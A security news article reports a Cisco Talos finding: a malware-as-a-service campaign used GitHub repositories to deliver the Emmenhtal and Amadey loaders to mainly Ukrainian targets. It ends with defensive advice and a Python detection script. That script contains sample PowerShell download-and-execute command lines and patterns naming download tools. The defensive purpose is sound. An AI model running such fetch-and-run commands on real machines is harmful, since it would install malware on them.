- GitHub is being weaponized as malware infrastructure, the report warns
- Emmenhtal and Amadey are part of a coordinated, multi-layered attack chain
- Victims are mainly Ukrainian organizations, but all GitHub users should be on their guard
Security researchers have discovered a sophisticated malware-as-a-service (MaaS) operation that abuses public GitHub repositories to compromise its targets.
In a blog post, Cisco Talos said the threat actors have evolved their delivery tactics, moving away from traditional phishing methods and towards GitHub, which is often allow-listed in corporate environments.
GitHub is an extremely popular platform in the open source world, and as such is under a constant barrage of attacks. This batch of malicious repositories has been taken down, as have countless before it.
How to defend against GitHub-based attacks
The campaign sought to deliver two malware families, Emmenhtal and Amadey, mainly to organizations in Ukraine.
Emmenhtal is a malware loader that usually drops SmokeLoader, another loader. Although a loader loading a loader may not sound logical at first, there is a strategic logic behind it.
Emmenhtal is designed as a stealthy multi-stage downloader that excels at initial infection and evasion. Once a foothold is established, it retrieves the next phase of the attack, SmokeLoader, a feature-rich modular loader specializing in post-infection operations.
Amadey, on the other hand, is a botnet first spotted around 2018 and sold mainly on Russian-speaking cybercrime forums. It acts as a modular downloader and system profiler, capable of delivering a wide range of malware, including infostealers and ransomware.
In this campaign, Amadey was hosted on GitHub and disguised in various ways, for example as an MP4 file, or embedded in Python scripts such as “Checkbalance.py”.
To defend against this and similar threats, companies should apply strict filtering of script-based attachments, keep a close eye on PowerShell execution and, as far as possible, review their GitHub policies.
They should also opt for defense in depth and behavioral monitoring, as these can help identify suspicious download patterns or payloads executed on targeted machines.
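To make the PowerShell-monitoring advice concrete, here is an added example (not code from the Talos report or this article) that scans constructed process-creation events for PowerShell downloads from GitHub hosts where the fetched object carries a media extension or is a script handed straight to an interpreter; the hostnames, repository paths and the list of download cmdlets are assumptions.

```python
import re
# Constructed sample process-creation events (Sysmon EID 1 / 4688 style); hosts,
# repository paths and file names are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "powershell.exe", "cmdline":
     "powershell Invoke-WebRequest https://raw.githubusercontent.com/example-user/repo/main/clip.mp4 "
     "-OutFile C:\\Users\\Public\\clip.mp4"},
    {"host": "ws02", "image": "powershell.exe", "cmdline":
     "powershell iwr https://github.com/example-user/repo/raw/main/Checkbalance.py "
     "-OutFile C:\\Users\\Public\\Checkbalance.py; python C:\\Users\\Public\\Checkbalance.py"},
    {"host": "ws03", "image": "powershell.exe", "cmdline": "powershell Get-ChildItem C:\\build"},
    {"host": "ws04", "image": "cmd.exe", "cmdline": "git clone https://github.com/example-org/tool.git"},
]

# GitHub content hosts (legitimate, but abused in this campaign) and download primitives (assumed list).
GITHUB_URL = re.compile(r"https?://(?:raw\.githubusercontent\.com|objects\.githubusercontent\.com|github\.com)/\S+", re.I)
DOWNLOADER = re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
                        r"DownloadFile|DownloadString|Start-BitsTransfer)\b", re.I)
MEDIA_EXT = re.compile(r"\.(?:mp4|avi|mp3|jpg|png|gif)\b", re.I)  # payload masquerading as media
SCRIPT_EXT = re.compile(r"\.(?:py|ps1|vbs|js|hta)\b", re.I)       # script payload
INTERPRETER = re.compile(r"\b(?:python|pythonw|wscript|cscript|mshta)\b", re.I)

def analyze(event):
    """Return the findings for one event; an empty list means nothing suspicious."""
    findings = []
    if not re.match(r"(?:powershell|pwsh)", event["image"], re.I):
        return findings  # only PowerShell-launched downloads are in scope here
    cmd = event["cmdline"]
    urls = GITHUB_URL.findall(cmd)
    if not urls or not DOWNLOADER.search(cmd):
        return findings  # no GitHub fetch from PowerShell: benign for this rule
    findings.append("PowerShell download from a GitHub host")
    for url in urls:
        if MEDIA_EXT.search(url):
            findings.append(f"media-named object fetched by PowerShell: {url}")
        if SCRIPT_EXT.search(url):
            findings.append(f"script fetched from GitHub: {url}")
    if SCRIPT_EXT.search(cmd) and INTERPRETER.search(cmd):
        findings.append("fetched script handed to an interpreter in the same command")
    return findings

def scan(events):
    """Map each host that has findings to its findings; quiet hosts are omitted."""
    report = {}
    for event in events:
        findings = analyze(event)
        if findings:
            report[event["host"]] = findings
    return report
```

Feed it real process-creation telemetry and the two-stage flags (media-named fetch, script piped to an interpreter) are the ones worth alerting on; a bare GitHub download alone will be noisy in developer environments.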